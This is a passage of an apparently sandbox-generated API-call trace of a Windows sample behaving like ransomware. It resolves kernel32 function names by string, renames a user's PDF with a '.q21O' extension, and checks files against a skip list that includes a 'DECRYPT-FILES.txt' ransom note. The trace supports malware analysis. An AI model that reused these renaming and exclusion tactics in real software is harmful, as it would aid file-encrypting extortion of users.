lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.463] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.463] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.463] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.463] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.463] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.463] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.463] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.463] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.464] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.464] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.464] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.464] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.464] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.464] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.464] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.464] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.464] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.464] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.464] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.464] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.464] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.464] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.464] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.464] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.464] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.464] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.464] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.464] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.465] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.465] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.465] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.465] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.465] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.465] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.465] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.465] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.465] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.465] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.465] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.465] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.465] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.465] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.465] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.465] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.465] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.465] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.465] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.466] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.466] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.466] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.466] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.466] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.466] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.466] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.466] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.466] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.466] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.466] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.466] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.466] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.466] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.466] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.466] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.466] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.466] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.466] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.467] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.467] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.467] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.467] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.467] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.467] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.467] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.467] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.467] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.467] lstrlenA (lpString="DELETEATOM") returned 10 [0084.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.467] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.467] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.467] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.467] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.467] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.467] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.467] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.467] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.467] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.468] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.468] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.468] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.468] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.468] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.468] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.468] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.468] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.468] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.468] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.468] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.468] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.468] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.468] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.468] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.468] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.468] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.468] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.469] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.469] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.469] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.469] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.469] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.469] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.469] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.469] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.469] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.469] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.469] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.469] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.469] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.469] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.469] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.469] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.469] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.469] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.469] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.469] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.469] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.469] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.469] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.469] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.469] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.469] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.469] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.469] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.470] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\52sYE55ED9y1bqufgLex.pdf") returned 99 [0084.470] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\52sYE55ED9y1bqufgLex.pdf.q21O") returned 104 [0084.470] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\52sYE55ED9y1bqufgLex.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\52sye55ed9y1bqufglex.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\52sYE55ED9y1bqufgLex.pdf.q21O" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\52sye55ed9y1bqufglex.pdf.q21o"), dwFlags=0x0) returned 1 [0084.470] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.471] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.471] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.471] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8899f8e0, ftCreationTime.dwHighDateTime=0x1d4cc02, ftLastAccessTime.dwLowDateTime=0x6a263490, ftLastAccessTime.dwHighDateTime=0x1d4c78a, ftLastWriteTime.dwLowDateTime=0x6a263490, ftLastWriteTime.dwHighDateTime=0x1d4c78a, nFileSizeHigh=0x0, nFileSizeLow=0x57db, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcdcPPw5PxakniwP.docx", cAlternateFileName="ACDCPP~1.DOC")) returned 1 [0084.471] lstrcmpiW (lpString1="AcdcPPw5PxakniwP.docx", lpString2="DECRYPT-FILES.txt") returned -1 [0084.471] lstrcmpiW (lpString1="AcdcPPw5PxakniwP.docx", lpString2="autorun.inf") returned -1 [0084.471] lstrcmpiW (lpString1="AcdcPPw5PxakniwP.docx", lpString2="boot.ini") returned -1 [0084.471] lstrcmpiW (lpString1="AcdcPPw5PxakniwP.docx", lpString2="desktop.ini") returned -1 [0084.471] lstrcmpiW (lpString1="AcdcPPw5PxakniwP.docx", lpString2="ntuser.dat") returned -1 [0084.471] lstrcmpiW (lpString1="AcdcPPw5PxakniwP.docx", lpString2="iconcache.db") returned -1 [0084.471] lstrcmpiW (lpString1="AcdcPPw5PxakniwP.docx", lpString2="bootsect.bak") returned -1 [0084.471] lstrcmpiW 